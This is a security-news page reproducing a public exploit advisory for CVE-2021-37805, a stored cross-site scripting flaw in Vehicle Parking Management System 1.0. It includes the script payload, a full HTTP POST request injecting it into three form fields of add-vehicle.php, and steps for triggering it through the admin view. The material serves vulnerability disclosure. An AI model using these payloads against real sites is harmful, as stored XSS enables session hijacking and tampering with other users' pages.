Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-37805: Vehicle Parking Management System 1.0 Cross Site Scripting ≈ Packet Storm

A Stored Cross Site Scripting (XSS) vunerability exists in Sourcecodeste Vehicle Parking Management System affected version 1.0 is via the add-vehicle.php endpoint.

CVE
Open in Source
#sql#xss#web#windows#git#php#auth#firefox
# Exploit Title: Vehicle Parking Management System -  Stored Cross-Site-Scripting (XSS)# Date: 2021-07-09# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/# Version: 1.0# Tested on: Windows 10, XAMPP################# Description  ################## The system is vulnerable to Stored XSS on add-vehicle.php endpoint.######### PoC  #########PoC ) param vehcomp,vehreno,ownername - Stored XSSPayload: 1;<script>alert(1);</script>Request: ========POST /vpms/add-vehicle.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------39455081863880051020862918006Content-Length: 842Origin: http://localhostDNT: 1Connection: closeReferer: http://localhost/vpms/add-vehicle.phpCookie: PHPSESSID=01nt1pa7lgtioktv5ii907c8l3Upgrade-Insecure-Requests: 1Sec-GPC: 1-----------------------------39455081863880051020862918006Content-Disposition: form-data; name="catename"Bicycles-----------------------------39455081863880051020862918006Content-Disposition: form-data; name="vehcomp"1;<script>alert(1);</script>-----------------------------39455081863880051020862918006Content-Disposition: form-data; name="vehreno"2;<script>alert(2);</script>-----------------------------39455081863880051020862918006Content-Disposition: form-data; name="ownername"3;<script>alert(3);</script>-----------------------------39455081863880051020862918006Content-Disposition: form-data; name="ownercontno"7627637673-----------------------------39455081863880051020862918006Content-Disposition: form-data; name="submit"-----------------------------39455081863880051020862918006--############# Fire up  #############1) Goto: Login as Admin2) Goto: Manage Vehicle -> Manage In Vehicle -> Click view3) Stored XSS payloads are fired

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE